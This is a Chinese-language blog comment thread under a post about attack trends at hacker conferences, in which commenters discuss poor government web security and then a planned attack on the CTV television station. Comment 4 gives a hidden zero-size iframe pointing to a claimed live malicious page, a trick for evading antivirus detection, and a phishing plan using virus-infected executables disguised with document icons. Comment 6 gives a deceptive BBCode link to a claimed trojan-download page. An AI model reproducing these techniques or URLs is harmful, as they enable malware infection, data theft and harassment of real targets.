從全球兩大駭客年會看攻擊趨勢

在〈從全球兩大駭客年會看攻擊趨勢〉中有 7 則留言

1. >>如果臺灣遭遇到類似(此指愛沙尼亞)的網路攻擊，政府相關部門，是否有足夠能力可以應付呢？
   我想大概沒有…不然就不會常常被大陸怪客換掉首頁了
   不過…其實也沒差啦
   網站的主機跟存放重要資料的主機通常是分開的 通常啦….

2. 絕對沒有。
   從天才官員說，因為常常被駭，所以擋大陸網站「讓台灣公務員連不上大陸官方網頁」。就知道這群傢伙只會浪費納稅人的錢。
   >網站的主機跟存放重要資料的主機通常是分開的
   我深信曾大力表揚丁丁大站的政府腦殘絕對有的比。
   說到這個，這幾天爆發藝人辱宅事件，大群阿宅（看過龍貓之森站長文章後，決定跟著撇清關係……）到處鬼吼鬼叫，狂掃中視討論區。只會在網路上叫囂有屁用啊？我一直跟某相熟BLOGGER說：「世上有兩種傻瓜：一種因為受了威脅而不採取行動，另一種是因為威脅別人而認為自己已採取行動。」（《魔鬼與普里姆小姐》）都很乾脆的告訴她要惡意程式或問題網站隨時有一堆可以提供，公家機關網管出了名的爛，一人一信一病毒、外加在討論區用iframe嵌問題網頁，保證讓中視哭不出來。
   外行人都不懂恐怖活動需要決心、實質傷害、詳盡本益考量跟絕對不跟資產階級壓迫者妥協的堅定態度。寄病毒多輕鬆愉快啊，也不用阿宅離開電腦……

3. >>因為常常被駭，所以擋大陸網站「讓台灣公務員連不上大陸官方網頁」
   我今天才知道有這種事 XD
   >>網站的主機跟存放重要資料的主機通常是分開的
   "通常"啦…….
   我猜事件個人其實不太了解呢,
   因為沒在看那節目,資訊來源都是K島或Blog,
   也不想為了這個去Youtube找(順代一提,ニコニコ動画也有得看….).
   不過從眾多Blog的報導,中視本身都以"節目效果"為由,
   似乎沒有什麼想要道歉的跡象….
   >>公家機關網管出了名的爛
   我又想到叫實習老師當網管這件事….
   >>討論區用iframe嵌問題網頁
   一般討論區能否運用iframe個人不太了解,
   只從XDite那看過相關介紹,我也沒什麼研究;
   倒是phpbb以前有個漏洞讓bbcode tag可使用xss….嗯,但好像早就補起來了.
   >>寄病毒多輕鬆愉快啊
   但我覺得中視根本就懶得開吶 XD

4. 有支援HTML語法就能用，大概像這樣：
   <iframe src="hxxp://web.59cn.cn/huang246/mm.htm" width="0" height="0" border="0"></iframe>
   裡面那個網址是真的惡意網頁，有膽可以連過去測防毒。然後把高跟寬換成「1、123」之類就能避過多數防毒的標準病毒碼或啟發式偵測。只是蜂擁聲援的阿宅鄉民會先死一票吧……
   >但我覺得中視根本就懶得開吶 XD
   當然要先蒐集大量相關人員信箱，名字取個急件、劇本更動、緊急通知、臨時變更之類有的沒的，把exe全局感染病毒換個DOC圖示，名字改掉……或是什麼「不要難過！永遠支持！這是我們的心意！」之類，寄給內射會……社交工程法永遠是用網路幹壞事的精髓所在啊。

5. 呃,我知道支援HTML就能用,
   貼ニコニコ動画也是用iframe….
   不過大部份的討論區都不給用HTML吧?
   >>裡面那個網址是真的惡意網頁
   感謝告知,您沒說我可能會點進去看,
   我不敢打沒把握的仗 XD
   >>寄給內射會
   大哥,寄給他們連圖示都不必換吧….
   您太高估對手了 XD

6. >>大哥,寄給他們連圖示都不必換吧….
   >>您太高估對手了 XD
   我也不打沒把握的仗啊。
   如果用BBCODE的話，不知道能不能用物件塞……不然可以這樣：「
   台灣文化及大眾媒體監督協會將在9/23進行遊行活動，以行動進行對中視之抗爭，相關路線及行動要點請見網頁：
   [url=www.duowna.com/ief/url.asp]http://www.wretch.cc/blog/dingdingnews&article_id=8530829[/url]
   」
   看得出玩的花招吧？看得到的內容從頭到尾都是真的（剛剛隨手去啥「台灣文化及大眾媒體監督協會」找來的），但LINK是假的。點進去網頁也只會一片白，只要防毒軟體掃不到，等到注意到網址不同時，木馬下載早被JS啟動了……可惜這種手法下載的程式多半是要盜資訊，不會有明顯傷害。一樣，那個LINK真的是惡意網頁……

7. 這是害沒注意狀態列的人進入惡意網頁,
   和iframe手法不太一樣吧! XD
   但至少不會害到全部的瀏覽者就是……

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料。